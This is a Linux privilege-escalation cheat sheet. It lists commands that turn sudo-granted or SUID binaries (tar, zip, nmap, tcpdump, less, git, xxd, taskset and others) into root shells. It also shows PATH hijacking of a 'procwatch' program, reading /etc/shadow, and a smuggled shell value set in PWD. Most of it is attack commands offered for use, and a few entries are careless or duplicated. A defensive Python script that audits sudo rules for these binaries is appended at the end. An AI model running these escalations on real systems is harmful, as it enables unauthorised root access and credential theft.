
How to Gain Root Privileges on a Linux System
Create a new ps file:
echo /bin/sh > ps
chmod +x ps
Create a new sh file:
echo /bin/sh > sh
chmod +x sh
Set PATH to:
export PATH=/var/www/backup:${PATH}
Run procwatch
Using zip command
$ cd /tmp
sudo zip test.zip test -T --unzip-command="sh -c /bin/bash"
Using tar command
$ sudo tar cf /dev/null test.tgz --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh
Using strace command
$ sudo strace -o/dev/null /bin/bash
Using tcpdump command
$ echo $'id\ncat /etc/shadow' > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root
Using nmap command
$ echo "os.execute('/bin/sh')" > /tmp/shell.nse
$ sudo nmap --script=/tmp/shell.nse
OR
nmap --interactive
!sh
Using scp command
$ sudo scp -S /path/yourscript x y
Using expect command
$ sudo expect
type: spawn sh, then sh
Using nano command
$ sudo nano -S /bin/bash
Type your command and hit CTRL+T
Using git command
$ sudo git help status
type: !/bin/bash
Using gdb/ftp command
$ sudo ftp
type: !/bin/sh
Using Less command
sudo less /etc/hosts
!bash
Using Man command
sudo man /etc/hosts
!bash
Using Git command
sudo git help status
!bash
xxd is a Linux command that creates a hex dump of a given file. With the SUID bit set, it reads the file with the permissions of the binary's owner:
xxd "/etc/shadow" | xxd -r
taskset, when the system binary has SUID permissions:
taskset 1 /bin/sh -p
export PWD=';/bin/bash'
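Every sudo-based entry above depends on a sudoers rule that grants one of these binaries. The following added example (not part of the original page) scans `sudo -l` style output for rules granting the binaries listed on this page; the sample output, the user and host names, and the function name audit_sudo_rules are constructed for illustration.

```python
import re

# Binaries this page lists as giving a shell when run through sudo.
SHELL_ESCAPE_BINARIES = {
    "zip", "tar", "strace", "tcpdump", "nmap", "scp", "expect",
    "nano", "git", "gdb", "ftp", "less", "man",
}

# Constructed sample of `sudo -l` output (not taken from a real host).
SAMPLE_SUDO_L = """\
User deploy may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/tar, /usr/bin/systemctl restart nginx
    (root) /usr/bin/less /var/log/nginx/*.log
    (backup) NOPASSWD: /usr/bin/rsync
    (ALL : ALL) ALL
"""

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")  # leading tags: NOPASSWD:, SETENV:, ...


def audit_sudo_rules(sudo_l_output):
    """Return (runas, command, reason) for each rule that needs review."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header or blank line, not a rule
        runas, rest = m.group("runas").strip(), m.group("rest")
        tags = TAG_RE.match(rest)
        nopasswd = bool(tags and "NOPASSWD:" in tags.group(0))
        commands = TAG_RE.sub("", rest).split(",")
        for cmd in filter(None, (c.strip() for c in commands)):
            if cmd == "ALL":
                findings.append((runas, cmd, "unrestricted"))
                continue
            name = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the binary
            if name in SHELL_ESCAPE_BINARIES:
                reason = "shell-escape binary" + (", NOPASSWD" if nopasswd else "")
                findings.append((runas, cmd, reason))
    return findings


if __name__ == "__main__":
    for runas, cmd, reason in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"[review] runas={runas!r} cmd={cmd!r}: {reason}")
```

Rules it flags are candidates for removal or for replacement with a fixed-argument wrapper; pass it the real output of `sudo -l -U <user>` in place of the sample.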